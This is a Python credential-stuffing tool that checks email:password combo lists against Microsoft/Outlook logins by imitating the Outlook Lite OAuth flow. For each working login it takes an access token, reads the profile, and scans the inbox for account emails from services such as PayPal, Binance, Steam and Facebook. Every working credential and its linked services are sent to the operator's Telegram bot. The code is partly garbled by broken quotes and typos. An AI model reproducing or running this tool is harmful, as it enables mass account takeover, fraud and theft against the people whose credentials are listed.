



# cheatglobal

```
#lbn-Suleiman | @CRR_V
import os , uuid , concurrent.futures
try:
    import requests
    from rich.console import Console
    from rich.panel import Panel
except ImportError:
    os.system('pip install requests rich')
    os.system('clear')
a,b=0,0
Tok = input('Enter Token : ')
id = input('Enter ID : ')
class all:
    @staticmethod
    def get_info(Email,Password,token,CID) -> str:
        he = {
            "User-Agent": "Outlook-Android/2.0",
            "Pragma": "no-cache",
            "Accept": "application/json",
            "ForceSync": "false",
            "Authorization": f"Bearer {token}",
            "X-AnchorMailbox": f"CID:{CID}",
            "Host": "substrate.office.com",
            "Connection": "Keep-Alive",
            "Accept-Encoding": "gzip"}
        r =
requests.get("https://substrate.office.com/profileb2/v2.0/me/V1Profile",headers=he).json()
info_name=(r.get('names', []))
info_Loca=(r.get('accounts',[]))
name=info_name[0]['displayName']
Loca=info_Loca[0]['location']
url = f"https://outlook.live.com/owa/{Email}/startupdata.ashx?app=Mini&n=0"
headers = {
```

```
"Host": "outlook.live.com",
"content-length": "0",
"x-owa-sessionid": f"{CID}",
"x-req-source": "Mini",
"authorization": f"Bearer {token}",
"user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G975N
Build/PQ3B.190801.08041932; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/91.0.4472.114 Mobile Safari/537.36",
"action": "StartupData",
"x-owa-correlationid": f"{CID}",
"ms-cv": "YizxQK73vePSyVZZXVeNr+.3",
"content-type": "application/json; charset=utf-8",
"accept": "/*/*",
"origin": "https://outlook.live.com",
"x-requested-with": "com.microsoft.outlooklite",
"sec-fetch-site": "same-origin",
"sec-fetch-mode": "cors",
"sec-fetch-dest": "empty",
"referrer": "https://outlook.live.com/",
"accept-encoding": "gzip, deflate",
"accept-language": "en-US,en;q=0.9"
}
```

```
rese = requests.post(url, headers=headers, data="").text
```

```
V1 = '✅ Facebook - V12' if 'security@facebookmail.com' in rese else None
V2 = '✅ Instagram - V12' if 'security@mail.instagram.com' in rese else None
V3 = '✅ PUBG - V12' if "noreply@pubgmobile.com" in rese else None
V4 = '✅ Konami - V12' if 'nintendo-noreply@ccg.nintendo.com' in rese else None
V5 = '✅ TikTok - V12' if 'register@account.tiktok.com' in rese else None
V6 = '✅ Twitter - V12' if 'info@x.com' in rese else None
V7 = '✅ PayPal - V12' if 'service@paypal.com.br' in rese else None
V8 = '✅ Binance - V12' if 'do-not-reply@ses.binance.com' in rese else None
V9 = '✅ NetFlix - V12' if 'info@account.netflix.com' in rese else None
V10 = '✅ Playstation - V12' if 'reply@txn-email.playstation.com' in rese else None
V11 = '✅ Supercell - V12' if 'noreply@id.supercell.com' in rese else None
V12 = '✅ EpicGames - V12' if 'help@acct.epicgames.com' in rese else None
V13 = '✅ Spotify - V12' if 'no-reply@spotify.com' in rese else None
V14 = '✅ Rockstar - V12' if 'noreply@rockstargames.com' in rese else None
V15 = '✅ Xbox - V12' if 'xboxreps@engage.xbox.com' in rese else None
V16 = '✅ Microsoft - V12' if 'account-security-
```

noreply@accountprotection.microsoft.com' in rese else None

V17 = '✅ **Steam - V12**' if 'noreply@steampowered.com' in rese else None

V18 = '✅ **Roblox - V12**' if 'accounts@roblox.com' in rese else None

V19 = '✅ **EA sports - V12**' if 'EA@e.ea.com' in rese else None

V20 = '✅ **Bitkub - V12**' if 'no-reply@bitkub.com' in rese else None

h = filter(None, [V1, V2, V3, V4, V5, V6, V7, V8, V9, V10, V11, V12, V13, V14, V15, V16, V17, V18, V19, V20])

hh = "\n".join(h)

ff = f"

<>>>>>[ Info - V12 ]<<<<<<<>

Email : {Email}

Password : {Password}

Name : {name}

Country : {Loca}

<>>>>>[ Linked - V12 ]<<<<<<<>

{hh}

<>>>>>[ DeV - V12 ]<<<<<<<>

"

requests.post(f"https://api.telegram.org/bot{Tok}/sendMessage?chat\_id={id}&text={ff}")

@staticmethod

def get\_token(Email,Password,cook,hh) -> str:

Code = hh.get('Location').split('code=')[1].split('&')[0]

CID = cook.get('MSPCID').upper()

try:

url = "https://login.microsoftonline.com/consumers/oauth2/v2.0/token"

data = {"client\_info": "1","client\_id": "e9b154d0-7658-433b-bb25-6b8e0a8a7c59",

"redirect\_uri":

"msauth://com.microsoft.outlooklite/fcg80qvoM1YMKJZibjBwQcDfOno%3D",

"grant\_type": "authorization\_code",

"code": Code,

"scope": "profile openid offline\_access https://outlook.office.com/M365.Access"}  
response = requests.post(url, data=data, headers={"Content-Type": "application/x-

www-form-urlencoded"})  
token = response.json()["access\_token"]  
all.get\_info(Email,Password,token,CID)  
except Exception as e:"

@staticmethod

def

```
login_protocol(Email,Password,URL,PPFT,AD,MSPRequ,uaid,RefreshTokenSso,MSPOK,OPa  
rams) -> str:
```

```
    global a,b
```

```
    try:
```

```
        lenn = f"i13=1&login={Email}&loginfmt=
```

```
{Email}&type=11&LoginOptions=1&Irt=&IrtPartition=&hisRegion=&hisScaleUnit=&passwd=
```

```
{Password}&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=
```

```
&hpgrequestid=&PPFT=
```

```
{PPFT}&PPSX=PassportR&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0
```

```
&IsFidoSupported=0&isSignupPost=0&isRecoveryAttemptPost=0&i19=9960"
```

```
    Ln = len(lenn)
```

```
    headers = {
```

```
        "Host": "login.live.com",
```

```
        "Connection": "keep-alive",
```

```
        "Content-Length": str(Ln),
```

```
        "Cache-Control": "max-age=0",
```

```
        "Upgrade-Insecure-Requests": "1",
```

```
        "Origin": "https://login.live.com",
```

```
        "Content-Type": "application/x-www-form-urlencoded",
```

```
        "User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G975N
```

```
Build/PQ3B.190801.08041932; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
```

```
Chrome/91.0.4472.114 Mobile Safari/537.36 PKeyAuth/1.0",
```

```
        "Accept":
```

```
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
```

```
q=0.8,application/signed-exchange;v=b3;q=0.9",
```

```
        "X-Requested-With": "com.microsoft.outlooklite",
```

```
        "Sec-Fetch-Site": "same-origin",
```

```
        "Sec-Fetch-Mode": "navigate",
```

```
        "Sec-Fetch-User": "?1",
```

```
        "Sec-Fetch-Dest": "document",
```

```
        "Referer": f"{AD}haschrome=1",
```

```
        "Accept-Encoding": "gzip, deflate",
```

```
        "Accept-Language": "en-US,en;q=0.9",
```

```
        "Cookie": f"MSPRequ={MSPRequ};uaid={uaid}; RefreshTokenSso=
```

```
{RefreshTokenSso}; MSPOK={MSPOK}; OParams={OParams};
```

```
MicrosoftApplicationsTelemetryDeviceId={uuid}"}
```

```
    res = requests.post(URL,data=lenn,headers=headers,allow_redirects=False)
```

```
    cook = res.cookies.get_dict()
```

```
    hh = res.headers
```

```
if any(key in cook for key in ["JSH", "JSHP", "ANON", "WLSSC"]) or res.text == ":
```

```
    all.get_token(Email>Password,cook,hh)
```

```
    a+=1
```

```
    print(f'\033[2;32m{a} - Good login : {Email} | {Password}')
```

```
else:
```

```
    b+=1
```

```
    print(f'\033[2;31m{b} - Bad Account : {Email} | {Password}')
```

```
except Exception as e:"
```

```
@staticmethod
```

```
def get_values(Email>Password):
```

```
    headers = {
```

```
#        "Host": "login.microsoftonline.com",
```

```
        "Connection": "keep-alive",
```

```
        "Upgrade-Insecure-Requests": "1",
```

```
        "User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G975N
```

```
Build/PQ3B.190801.08041932; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
```

```
Chrome/91.0.4472.114 Mobile Safari/537.36 PKeyAuth/1.0",
```

```
        "Accept":
```

```
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
```

```
q=0.8,application/signed-exchange;v=b3;q=0.9",
```

```
        "return-client-request-id": "false",
```

```
        "client-request-id": "205740b4-7709-4500-a45b-b8e12f66c738",
```

```
        "x-ms-sso-ignore-sso": "1",
```

```
        "correlation-id": str(uuid.uuid4()),
```

```
        "x-client-ver": "1.1.0+9e54a0d1",
```

```
        "x-client-os": "28",
```

```
        "x-client-sku": "MSAL.xplat.android",
```

```
        "x-client-src-sku": "MSAL.xplat.android",
```

```
        "X-Requested-With": "com.microsoft.outlooklite",
```

```
        "Sec-Fetch-Site": "none",
```

```
        "Sec-Fetch-Mode": "navigate",
```

```
        "Sec-Fetch-User": "?1",
```

```
        "Sec-Fetch-Dest": "document",
```

```
        "Accept-Encoding": "gzip, deflate",
```

```
        "Accept-Language": "en-US,en;q=0.9",
```

```
    }
```

```
    try:
```

```
        response =
```

```
requests.get("https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?
```

```
client_info=1&haschrome=1&login_hint="+str(Email)+"&mkt=en&response_type=code&client_
id=e9b154d0-7658-433b-bb25-
6b8e0a8a7c59&scope=profile%20openid%20offline_access%20https%3A%2F%2Foutlook.off
ice.com%2FM365.Access&redirect_uri=msauth%3A%2F%2Fcom.microsoft.outlooklite%2Ffcg
80qvoM1YMKJZibjBwQcDfOno%253D" ,headers=headers)
```

```
cok = response.cookies.get_dict()
```

```
URL = response.text.split("urlPost:")[1].split("")[0]
```

```
PPFT = response.text.split('name="PPFT" id="i0327" value="')[1].split(",")[0]
```

```
AD = response.url.split('haschrome=1')[0]
```

```
MSPRequ = cok['MSPRequ']
```

```
uaid = cok['uaid']
```

```
RefreshTokenSso = cok['RefreshTokenSso']
```

```
MSPOK = cok['MSPOK'],
```

```
OParams = cok['OParams']
```

```
all.login_protocol(Email,Password,URL,PPFT,AD,MSPRequ,uaid,RefreshTokenSso,MSPOK,O
Params)
```

```
except Exception as e:
```

```
all.get_values(Email,Password)
```

```
@staticmethod
```

```
def fff():
```

```
file = input('Enter Combo : ')
```

```
executor = concurrent.futures.ThreadPoolExecutor(max_workers=50)
```

```
with open(file, "r") as f:
```

```
for line in f:
```

```
try:
```

```
if ':' in line:
```

```
email = line.strip().split(':')[0]
```

```
password = line.strip().split(':')[1]
```

```
executor.submit(all.get_values,email,password)
```

```
else:
```

```
pass
```

```
except Exception as e:
```

```
pass
```

```
class One:
```

```
@staticmethod
```

```
def get_info(Email,Password,token,CID,app) -> str:
```

```
global a,b
```

```
print(app)
he = {
    "User-Agent": "Outlook-Android/2.0",
    "Pragma": "no-cache",
    "Accept": "application/json",
    "ForceSync": "false",
    "Authorization": f"Bearer {token}",
    "X-AnchorMailbox": f"CID:{CID}",
    "Host": "substrate.office.com",
    "Connection": "Keep-Alive",
    "Accept-Encoding": "gzip"}
r =
requests.get("https://substrate.office.com/profileb2/v2.0/me/V1Profile",headers=he).json()
info_name=(r.get('names', []))
info_Loca=(r.get('accounts',[]))
name=info_name[0]['displayName']
Loca=info_Loca[0]['location']
url = f"https://outlook.live.com/owa/{Email}/startupdata.ashx?app=Mini&n=0"
headers = {
    "Host": "outlook.live.com",
    "content-length": "0",
    "x-owa-sessionid": f"{CID}",
    "x-req-source": "Mini",
    "authorization": f"Bearer {token}",
    "user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G975N
Build/PQ3B.190801.08041932; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/91.0.4472.114 Mobile Safari/537.36",
    "action": "StartupData",
    "x-owa-correlationid": f"{CID}",
    "ms-cv": "YizxQK73vePSyVZZXVeNr+.3",
    "content-type": "application/json; charset=utf-8",
    "accept": "*/*",
    "origin": "https://outlook.live.com",
    "x-requested-with": "com.microsoft.outlooklite",
    "sec-fetch-site": "same-origin",
    "sec-fetch-mode": "cors",
    "sec-fetch-dest": "empty",
    "referrer": "https://outlook.live.com/",
    "accept-encoding": "gzip, deflate",
```

```

    "accept-language": "en-US,en;q=0.9"
}
rese = requests.post(url, headers=headers, data="").text
if str(app) in rese:
    a += 1
    print(f'\033[2;32m{a} - Good login : {Email} | {Password}')
    ff = f"
<>>>>>[ Info - V12 ]<<<<<<<
Email : {Email}
Password : {Password}
Name : {name}
Country : {Loca}
<>>>>>[ Info - V12 ]<<<<<<<
'''
    requests.post(f'https://api.telegram.org/bot{Tok}/sendMessage?chat_id={id}&text={ff}')
else:
    b+=1
    print(f'\033[1;33m{b} - Good Account but Not {app} : {Email} | {Password}')

@staticmethod
def get_token(Email,Password,cook,hh,app) -> str:
    Code = hh.get('Location').split('code=')[1].split('&')[0]
    CID = cook.get('MSPCID').upper()
    try:
        url = "https://login.microsoftonline.com/consumers/oauth2/v2.0/token"
        data = {"client_info": "1","client_id": "e9b154d0-7658-433b-bb25-6b8e0a8a7c59",
            "redirect_uri":
"msauth://com.microsoft.outlooklite/fcg80qvoM1YMKJZibjBwQcDfOno%3D",
            "grant_type": "authorization_code",
            "code": Code,
            "scope": "profile openid offline_access https://outlook.office.com/M365.Access"}
        response = requests.post(url, data=data, headers={"Content-Type": "application/x-
www-form-urlencoded"})
        token = response.json()["access_token"]
        One.get_info(Email,Password,token,CID,app)
    except Exception as e:"

@staticmethod
def

```

```
login_protocol(Email,Password,URL,PPFT,AD,MSPRequ,uaid,RefreshTokenSso,MSPOK,OPa  
rams,app) -> str:
```

```
  global a,b
```

```
  try:
```

```
    lenn = f"i13=1&login={Email}&loginfmt=
```

```
{Email}&type=11&LoginOptions=1&Irt=&IrtPartition=&hisRegion=&hisScaleUnit=&passwd=
```

```
{Password}&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=  
&hpgrequestid=&PPFT=
```

```
{PPFT}&PPSX=PassportR&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0  
&IsFidoSupported=0&isSignupPost=0&isRecoveryAttemptPost=0&i19=9960"
```

```
    Ln = len(lenn)
```

```
    headers = {
```

```
      "Host": "login.live.com",
```

```
      "Connection": "keep-alive",
```

```
      "Content-Length": str(Ln),
```

```
      "Cache-Control": "max-age=0",
```

```
      "Upgrade-Insecure-Requests": "1",
```

```
      "Origin": "https://login.live.com",
```

```
      "Content-Type": "application/x-www-form-urlencoded",
```

```
      "User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G975N
```

```
Build/PQ3B.190801.08041932; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
```

```
Chrome/91.0.4472.114 Mobile Safari/537.36 PKeyAuth/1.0",
```

```
      "Accept":
```

```
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
```

```
q=0.8,application/signed-exchange;v=b3;q=0.9",
```

```
      "X-Requested-With": "com.microsoft.outlooklite",
```

```
      "Sec-Fetch-Site": "same-origin",
```

```
      "Sec-Fetch-Mode": "navigate",
```

```
      "Sec-Fetch-User": "?1",
```

```
      "Sec-Fetch-Dest": "document",
```

```
      "Referer": f"{AD}haschrome=1",
```

```
      "Accept-Encoding": "gzip, deflate",
```

```
      "Accept-Language": "en-US,en;q=0.9",
```

```
      "Cookie": f"MSPRequ={MSPRequ};uaid={uaid}; RefreshTokenSso=
```

```
{RefreshTokenSso}; MSPOK={MSPOK}; OParams={OParams};
```

```
MicrosoftApplicationsTelemetryDeviceId={uuid}"}
```

```
    res = requests.post(URL,data=lenn,headers=headers,allow_redirects=False)
```

```
    cook = res.cookies.get_dict()
```

```
    hh = res.headers
```

```
if any(key in cook for key in ["JSH", "JSHP", "ANON", "WLSSC"]) or res.text == ":
```

```
    One.get_token(Email,Password,cook,hh,app)
```

```
else:
```

```
    b+=1
```

```
    print(f'\033[2;31m{b} - Bad Account : {Email} | {Password}')
```

```
except Exception as e:"
```

```
@staticmethod
```

```
def get_values(Email,Password,app):
```

```
    headers = {
```

```
#        "Host": "login.microsoftonline.com",
```

```
        "Connection": "keep-alive",
```

```
        "Upgrade-Insecure-Requests": "1",
```

```
        "User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G975N
```

```
Build/PQ3B.190801.08041932; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
```

```
Chrome/91.0.4472.114 Mobile Safari/537.36 PKeyAuth/1.0",
```

```
        "Accept":
```

```
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
```

```
q=0.8,application/signed-exchange;v=b3;q=0.9",
```

```
        "return-client-request-id": "false",
```

```
        "client-request-id": "205740b4-7709-4500-a45b-b8e12f66c738",
```

```
        "x-ms-sso-ignore-sso": "1",
```

```
        "correlation-id": str(uuid.uuid4()),
```

```
        "x-client-ver": "1.1.0+9e54a0d1",
```

```
        "x-client-os": "28",
```

```
        "x-client-sku": "MSAL.xplat.android",
```

```
        "x-client-src-sku": "MSAL.xplat.android",
```

```
        "X-Requested-With": "com.microsoft.outlooklite",
```

```
        "Sec-Fetch-Site": "none",
```

```
        "Sec-Fetch-Mode": "navigate",
```

```
        "Sec-Fetch-User": "?1",
```

```
        "Sec-Fetch-Dest": "document",
```

```
        "Accept-Encoding": "gzip, deflate",
```

```
        "Accept-Language": "en-US,en;q=0.9",
```

```
    }
```

```
    try:
```

```
        response =
```

```
requests.get("https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?
```

```
client_info=1&haschrome=1&login_hint="+str(Email)+"&mkt=en&response_type=code&client_
```

```
id=e9b154d0-7658-433b-bb25-
```

```
6b8e0a8a7c59&scope=profile%20openid%20offline_access%20https%3A%2F%2Foutlook.office.com%2F%2FM365.Access&redirect_uri=msauth%3A%2F%2Fcom.microsoft.outlooklite%2Ffcg80qvoM1YMKJZibjBwQcDfOno%253D" ,headers=headers)
```

```
cok = response.cookies.get_dict()
URL = response.text.split("urlPost:")[1].split("")[0]
PPFT = response.text.split('name="PPFT" id="i0327" value="')[1].split(",")[0]
AD = response.url.split('haschrome=1')[0]
MSPRequ = cok['MSPRequ']
uaid = cok['uaid']
RefreshTokenSso = cok['RefreshTokenSso']
MSPOK = cok['MSPOK'],
OParams = cok['OParams']
```

```
One.login_protocol(Email,Password,URL,PPFT,AD,MSPRequ,uaid,RefreshTokenSso,MSPOK,OParams,app)
```

```
except Exception as e:
```

```
One.get_values(Email,Password,app)
```

```
@staticmethod
```

```
def fff():
```

```
emails = {
1: 'security@facebookmail.com',
2: 'security@mail.instagram.com',
3: 'noreply@pubgmobile.com',
4: 'nintendo-noreply@ccg.nintendo.com',
5: 'register@account.tiktok.com',
6: 'info@x.com',
7: 'service@paypal.com.br',
8: 'do-not-reply@ses.binance.com',
9: 'info@account.netflix.com',
10: 'reply@txn-email.playstation.com',
11: 'noreply@id.supercell.com',
12: 'help@acct.epicgames.com',
13: 'no-reply@spotify.com',
14: 'noreply@rockstargames.com',
15: 'xboxreps@engage.xbox.com',
16: 'account-security-noreply@accountprotection.microsoft.com',
17: 'noreply@steampowered.com',
18: 'accounts@roblox.com',
19: 'EA@e.ea.com',
```

```

20: 'no-reply@bitkub.com'
}

apps = [
"Facebook", "Instagram", "PUBG", "Konami", "TikTok", "Twitter", "PayPal", "Binance",
"Netflix", "PlayStation", "Supercell", "Epic Games", "Spotify", "Rockstar", "Xbox",
"Microsoft", "Steam", "Roblox", "EA Sports", "Bitkub"
]

for app in enumerate(apps, start=1):
    print(app)
    ap = int(input("\n\nSelect : "))
    aap = emails[ap]
    os.system('clear')
    file = input('Enter Combo : ')
    executor = concurrent.futures.ThreadPoolExecutor(max_workers=50)
    with open(file, "r") as f:
        for line in f:
            try:
                if ':' in line:
                    email = line.strip().split(':')[0]
                    password = line.strip().split(':')[1]
                    executor.submit(One.get_values, email, password, aap)
            else:pass
        except Exception as e:pass

if __name__ == '__main__':
    console = Console()
    os.system('clear')
    P = Panel('[bold yellow]lbn-Suleiman | @CRR_V\n\n[bold bright_red]1 - Check All
applications\n\n2 - Check One applications[/bold bright_red]\n', border_style="bright_green")
    console.print(P)
    V12 = input("\n\nSelect : ")
    os.system('clear')
    if V12 == '1':
        all.fff()
    elif V12 == '2':
        One.fff()
    else:
        print('Not ❌')

```